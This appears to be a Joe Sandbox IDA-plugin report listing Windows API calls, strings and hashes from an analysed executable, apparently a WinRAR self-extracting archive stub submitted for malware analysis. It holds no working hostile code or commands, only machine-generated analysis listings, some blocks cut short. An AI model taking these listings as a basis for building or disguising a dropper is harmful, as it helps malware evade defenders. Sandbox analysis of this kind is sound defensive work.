                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA7893
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA78A3
                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CA78DE
                                              • __aullrem.LIBCMT ref: 00CA7984
                                              Similarity
                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                              • String ID:
                                              • API String ID: 1247370737-0
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CA0E50
                                              • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00CA0E85
                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00CA0EC4
                                              • _wcslen.LIBCMT ref: 00CA0ED4
                                              • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 00CA0F51
                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00CA0F93
                                              • _wcslen.LIBCMT ref: 00CA0FA3
                                              Similarity
                                              • API ID: FullNamePath$_wcslen$H_prolog3_
                                              • String ID:
                                              • API String ID: 840513527-0
                                              APIs
                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00CC69AE,?,00000000,?,00000000,00000000), ref: 00CC627B
                                              • __fassign.LIBCMT ref: 00CC62F6
                                              • __fassign.LIBCMT ref: 00CC6311
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00CC6337
                                              • WriteFile.KERNEL32(?,?,00000000,00CC69AE,00000000,?,?,?,?,?,?,?,?,?,00CC69AE,?), ref: 00CC6356
                                              • WriteFile.KERNEL32(?,?,00000001,00CC69AE,00000000,?,?,?,?,?,?,?,?,?,00CC69AE,?), ref: 00CC638F
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 00CB93F7
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00CB93FF
                                              • _ValidateLocalCookies.LIBCMT ref: 00CB9488
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00CB94B3
                                              • _ValidateLocalCookies.LIBCMT ref: 00CB9508
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 1170836740-1018135373
                                              • Opcode ID: 48b1c6ed007f75dbf642c56891408dbe2787555565239021b58aefb0884ebc8c
                                              • Instruction ID: be24cbbe1ed58017476ed4884799aff8ddc2131a370632947c72027f40c4eb92
                                              • Opcode Fuzzy Hash: 48b1c6ed007f75dbf642c56891408dbe2787555565239021b58aefb0884ebc8c
                                              • Instruction Fuzzy Hash: 82419234A00218AFCF10DF68C885ADEBBB5EF45314F148555E929AB3A2D731EE06CF91
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CAE26C
                                              • ShowWindow.USER32(?,00000000,00000038), ref: 00CAE294
                                              • GetWindowRect.USER32(?,?), ref: 00CAE2D8
                                              • ShowWindow.USER32(?,00000005,?,00000000), ref: 00CAE373
                                              • ShowWindow.USER32(00000000,00000005), ref: 00CAE394
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Window$Show$H_prolog3_Rect
                                              • String ID: RarHtmlClassName
                                              • API String ID: 950582801-1658105358
                                              • Opcode ID: 422d2820b32edecfdc1ea593a5409ae8988b230d15c9ae189571f4debdc36dc9
                                              • Instruction ID: c85eeec99c039d65e8cae5b587b1c8dbd121dca70a64628ff05fb14c06c4b272
                                              • Opcode Fuzzy Hash: 422d2820b32edecfdc1ea593a5409ae8988b230d15c9ae189571f4debdc36dc9
                                              • Instruction Fuzzy Hash: 83418A71901209EFDF119FA4DC89BEE7BB8EF49304F044259F919AB1A5DB309A41DBA0
                                              APIs
                                                • Part of subcall function 00CC3518: _free.LIBCMT ref: 00CC3541
                                              • _free.LIBCMT ref: 00CC35A2
                                                • Part of subcall function 00CC03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?), ref: 00CC03EA
                                                • Part of subcall function 00CC03D4: GetLastError.KERNEL32(?,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?,?), ref: 00CC03FC
                                              • _free.LIBCMT ref: 00CC35AD
                                              • _free.LIBCMT ref: 00CC35B8
                                              • _free.LIBCMT ref: 00CC360C
                                              • _free.LIBCMT ref: 00CC3617
                                              • _free.LIBCMT ref: 00CC3622
                                              • _free.LIBCMT ref: 00CC362D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                              • Instruction ID: 566f6b1a25977ee3f3a756cca87a76524d0547e30787ea139f54a829ab9e75e2
                                              • Opcode Fuzzy Hash: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                              • Instruction Fuzzy Hash: 4F11C971550B84FBD630BBB0DC46FCB779CAF04700F44881DF299A6162DA75A605A790
                                              APIs
                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CB4DDA,00CB4D3D,00CB4FDE), ref: 00CB4D76
                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CB4D8C
                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CB4DA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleModule
                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                              • API String ID: 667068680-1718035505
                                              • Opcode ID: f5d094d0b0348891d81adbc39ed32759e4584b0deb56cd16bf9705d049629913
                                              • Instruction ID: c1b675c8003abe2a76c8eb3e6191de8b7bff6819d494014a6c04bfa675b8281e
                                              • Opcode Fuzzy Hash: f5d094d0b0348891d81adbc39ed32759e4584b0deb56cd16bf9705d049629913
                                              • Instruction Fuzzy Hash: EEF02B31709B72AF0F2A5FB5DDC4BFE23DCAA06719B14053DD621D7282E620CE118791
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CBC5A2,00CBC5A2,?,?,?,00CC185A,00000001,00000001,C5E85006), ref: 00CC1663
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CC185A,00000001,00000001,C5E85006,?,?,?), ref: 00CC16E9
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CC17E3
                                              • __freea.LIBCMT ref: 00CC17F0
                                                • Part of subcall function 00CC040E: RtlAllocateHeap.NTDLL(00000000,00CB535E,?,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E,?,?,?,?), ref: 00CC0440
                                              • __freea.LIBCMT ref: 00CC17F9
                                              • __freea.LIBCMT ref: 00CC181E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                              • String ID:
                                              • API String ID: 1414292761-0
                                              • Opcode ID: 853c5267de763228698e3bf4f91e3770824a68c2d594fef290cd281187b00eb9
                                              • Instruction ID: 60a3e24d4ab680da2edf0dd664d2428d9872d37ab7d4af284cb5a10ec354ce5e
                                              • Opcode Fuzzy Hash: 853c5267de763228698e3bf4f91e3770824a68c2d594fef290cd281187b00eb9
                                              • Instruction Fuzzy Hash: B751CE72600206ABDB259E66CC81FAB76AAEB46750F2D422CFC14D6182EB34DD91D750
                                              APIs
                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 00CA7B06
                                                • Part of subcall function 00CA067E: GetVersionExW.KERNEL32(?), ref: 00CA06AF
                                              • LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 00CA7B2A
                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00CA7B44
                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 00CA7B57
                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00CA7B67
                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00CA7B77
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Time$File$System$Local$SpecificVersion
                                              • String ID:
                                              • API String ID: 2092733347-0
                                              • Opcode ID: c07f27f4ddda9a27a6ec72e531b427b9a128feee8302264611b83cc9627745de
                                              • Instruction ID: ae3c0c0a63ac417ef3d0905850401e5580cccfc9c322dc3c4de8b13df0c2290a
                                              • Opcode Fuzzy Hash: c07f27f4ddda9a27a6ec72e531b427b9a128feee8302264611b83cc9627745de
                                              • Instruction Fuzzy Hash: AE4127761083059BC704DFA9D884A9FB7E8FF98714F04891EF999C7210E730D949CBA6
                                              APIs
                                              • FileTimeToSystemTime.KERNEL32(?,?,9CAA5719,?,?,?,?,00CCAA27,000000FF), ref: 00CAF38A
                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,00CCAA27,000000FF), ref: 00CAF399
                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,00CCAA27,000000FF), ref: 00CAF3A7
                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00CCAA27,000000FF), ref: 00CAF3B5
                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,00CCAA27,000000FF), ref: 00CAF3D0
                                              • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,00CCAA27,000000FF), ref: 00CAF3FA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Time$System$File$Format$DateLocalSpecific
                                              • String ID:
                                              • API String ID: 909090443-0
                                              • Opcode ID: e4525f0a8f8ed2ad98ea65e93a042140b96995bbf26810fd4de62bd40d0188da
                                              • Instruction ID: da2d78c80ff399d6b43473dd4251c5a643ce127e12d8489d4aded9e6aa819704
                                              • Opcode Fuzzy Hash: e4525f0a8f8ed2ad98ea65e93a042140b96995bbf26810fd4de62bd40d0188da
                                              • Instruction Fuzzy Hash: CF3119B2500189AFDB20DFA5DC85FEF77ACFB09700F04412AF90AD6141EB34AA05CB60
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00CB9771,00CB96CC,00CB6A64), ref: 00CB9788
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CB9796
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CB97AF
                                              • SetLastError.KERNEL32(00000000,00CB9771,00CB96CC,00CB6A64), ref: 00CB9801
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: 1238cc30a78075520a48b20e42687835419a8b8b94705519922d433a73c6340c
                                              • Instruction ID: a2f48d80c539e2e75cf3b93e9a95efe5f84e63bbcdadf5773889c882592d3fe0
                                              • Opcode Fuzzy Hash: 1238cc30a78075520a48b20e42687835419a8b8b94705519922d433a73c6340c
                                              • Instruction Fuzzy Hash: CE0175365292115E96242FB56CE57EA2B98EB03776F31032AF624651E0EE714C01E145
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00CBB581,?,00CDE088,?,00CBAE80,?,00CDE088,?,00000007), ref: 00CC0009
                                              • _free.LIBCMT ref: 00CC003C
                                              • _free.LIBCMT ref: 00CC0064
                                              • SetLastError.KERNEL32(00000000,00CDE088,?,00000007), ref: 00CC0071
                                              • SetLastError.KERNEL32(00000000,00CDE088,?,00000007), ref: 00CC007D
                                              • _abort.LIBCMT ref: 00CC0083
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: 021de69bf6129c2f0a8f0438e6361a5b78040e27084a0648f2a1a603b599690e
                                              • Instruction ID: b3c0d302d83a23d351ac71429a55be8a81b18e58c06069f357def3a2050fcdd3
                                              • Opcode Fuzzy Hash: 021de69bf6129c2f0a8f0438e6361a5b78040e27084a0648f2a1a603b599690e
                                              • Instruction Fuzzy Hash: E8F04435144600E7C3227379EC46F6F2A559BD2762F3B012CF929922A2EF758D43A614
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CB3FDB
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CB3FF5
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB4006
                                              • TranslateMessage.USER32(?), ref: 00CB4010
                                              • DispatchMessageW.USER32(?), ref: 00CB401A
                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CB4025
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                              • String ID:
                                              • API String ID: 2148572870-0
                                              • Opcode ID: 3c8fc1eaa2e0423edb91d3fafdd2cc2f078e22d6bf3957fad12f241a9227e0fb
                                              • Instruction ID: b4658537507dcdbe28a0432ee0ad25be2976600c17e35a189441e1124997fc58
                                              • Opcode Fuzzy Hash: 3c8fc1eaa2e0423edb91d3fafdd2cc2f078e22d6bf3957fad12f241a9227e0fb
                                              • Instruction Fuzzy Hash: B8F03C72A05129ABCF206BA1EC8CFDF7F6DEF45391F004111F61AE6050E6349641CBA0
                                              APIs
                                              • GetDlgItem.USER32(?,00000066), ref: 00CB26A9
                                              • SendMessageW.USER32(00000000,00000143,00000000,00CE5380), ref: 00CB26D6
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CB2702
                                              Strings
                                              • ProgramFilesDir, xrefs: 00CB25E0
                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00CB25F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: MessageSend$Item
                                              • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                              • API String ID: 3888421826-2634093826
                                              • Opcode ID: 63e9056500e8155dddc0df68d216b4b89d637b98ae4240574d4014ac9a0372a6
                                              • Instruction ID: 659208b693f7031f4d135f2e69b84e3a6a97c9a9eea0720a6ca81ff12d6599be
                                              • Opcode Fuzzy Hash: 63e9056500e8155dddc0df68d216b4b89d637b98ae4240574d4014ac9a0372a6
                                              • Instruction Fuzzy Hash: 26816F31900259DEDF24EBE0C896FEDB7B8AF18310F54019AE945B7191EB705F89EB60
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _wcslen$H_prolog3
                                              • String ID: &nbsp;$<br>
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CB3F03
                                              • SetEnvironmentVariableW.KERNEL32(sfxcmd,?,?,?,?,?,?,00000028), ref: 00CB3F1B
                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00CB3F86
                                              Strings
                                              Similarity
                                              • API ID: EnvironmentVariable$H_prolog3_
                                              • String ID: sfxcmd$sfxpar
                                              APIs
                                              • LoadBitmapW.USER32(00000065), ref: 00CB07F5
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00CB081A
                                              • DeleteObject.GDI32(00000000), ref: 00CB084C
                                              • DeleteObject.GDI32(00000000), ref: 00CB086F
                                                • Part of subcall function 00CAEBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CB0845,00000066), ref: 00CAEBE6
                                                • Part of subcall function 00CAEBD3: SizeofResource.KERNEL32(00000000,?,?,?,00CB0845,00000066), ref: 00CAEBFD
                                                • Part of subcall function 00CAEBD3: LoadResource.KERNEL32(00000000,?,?,?,00CB0845,00000066), ref: 00CAEC14
                                                • Part of subcall function 00CAEBD3: LockResource.KERNEL32(00000000,?,?,?,00CB0845,00000066), ref: 00CAEC23
                                                • Part of subcall function 00CAEBD3: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CB0845,00000066), ref: 00CAEC3E
                                                • Part of subcall function 00CAEBD3: GlobalLock.KERNEL32(00000000), ref: 00CAEC4F
                                                • Part of subcall function 00CAEBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CAEC73
                                                • Part of subcall function 00CAEBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CAECB8
                                                • Part of subcall function 00CAEBD3: GlobalUnlock.KERNEL32(00000000), ref: 00CAECD7
                                                • Part of subcall function 00CAEBD3: GlobalFree.KERNEL32(00000000), ref: 00CAECDE
                                              Strings
                                              Similarity
                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                              • String ID: ]
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CBECE0,00000000,?,00CBEC80,00000000,00CD6F40,0000000C,00CBEDD7,00000000,00000002), ref: 00CBED4F
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CBED62
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00CBECE0,00000000,?,00CBEC80,00000000,00CD6F40,0000000C,00CBEDD7,00000000,00000002), ref: 00CBED85
                                              Strings
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              APIs
                                                • Part of subcall function 00CA6C5E: __EH_prolog3_GS.LIBCMT ref: 00CA6C65
                                                • Part of subcall function 00CA6C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00CA6C9A
                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CA50B3
                                              • GetProcAddress.KERNEL32(00CE51F8,CryptUnprotectMemory), ref: 00CA50C3
                                              Strings
                                              Similarity
                                              • API ID: AddressProc$DirectoryH_prolog3_System
                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                              APIs
                                              Similarity
                                              • API ID: AdjustPointer$_abort
                                              • String ID:
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9F3C5
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,00C9B749,?,?,?,?,?,?), ref: 00C9F450
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 00C9F4A7
                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 00C9F569
                                              • CloseHandle.KERNEL32(?), ref: 00C9F570
                                              Similarity
                                              • API ID: File$Create$CloseH_prolog3_HandleTime
                                              • String ID:
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 00CC2BE9
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CC2C0C
                                                • Part of subcall function 00CC040E: RtlAllocateHeap.NTDLL(00000000,00CB535E,?,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E,?,?,?,?), ref: 00CC0440
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CC2C32
                                              • _free.LIBCMT ref: 00CC2C45
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CC2C54
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              • String ID:
                                              APIs
                                              • GetLastError.KERNEL32(00CB535E,00CB535E,?,00CC01D8,00CC0451,?,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E,?), ref: 00CC008E
                                              • _free.LIBCMT ref: 00CC00C3
                                              • _free.LIBCMT ref: 00CC00EA
                                              • SetLastError.KERNEL32(00000000,?,00CB535E), ref: 00CC00F7
                                              • SetLastError.KERNEL32(00000000,?,00CB535E), ref: 00CC0100
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              APIs
                                              • _free.LIBCMT ref: 00CC34C7
                                                • Part of subcall function 00CC03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?), ref: 00CC03EA
                                                • Part of subcall function 00CC03D4: GetLastError.KERNEL32(?,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?,?), ref: 00CC03FC
